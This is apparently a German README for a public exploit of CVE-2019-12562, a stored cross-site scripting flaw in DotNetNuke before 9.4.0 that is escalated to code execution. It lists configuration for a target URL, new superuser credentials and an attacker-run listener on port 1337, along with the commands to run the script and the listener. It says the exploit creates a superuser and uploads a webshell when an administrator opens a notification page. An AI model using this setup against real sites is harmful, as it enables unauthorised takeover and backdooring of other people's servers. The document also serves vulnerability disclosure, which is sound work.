
Gespeichertes Cross-Site Scripting in DotNetNuke (DNN) Version vor 9.4.0 | XSS zu RCE
CVE-2019-12562 Stored Cross-Site Scripting in DotNetNuke (DNN) Version vor 9.4.0 erlaubt es entfernten Angreifern, das bösartige Skript in der Admin-Benachrichtigungsseite zu speichern und einzubetten. Der Exploit könnte verwendet werden, um jede Aktion mit Administratorrechten durchzuführen, wie das Verwalten von Inhalten, das Hinzufügen von Benutzern, das Hochladen von Hintertüren auf den Server usw. Eine erfolgreiche Ausnutzung erfolgt, wenn ein Administrator eine Benachrichtigungsseite mit gespeichertem Cross-Site Scripting besucht.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
Dieser Exploit wird einen Superuser erstellen und eine Webshell auf dem Zielserver hochladen
Exploit-Bedingung: Eine erfolgreiche Ausnutzung erfolgt, wenn ein Administrator eine Benachrichtigungsseite besucht.
Weiterlesen: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE-Referenz: https://www.cvedetails.com/cve/CVE-2019-12562/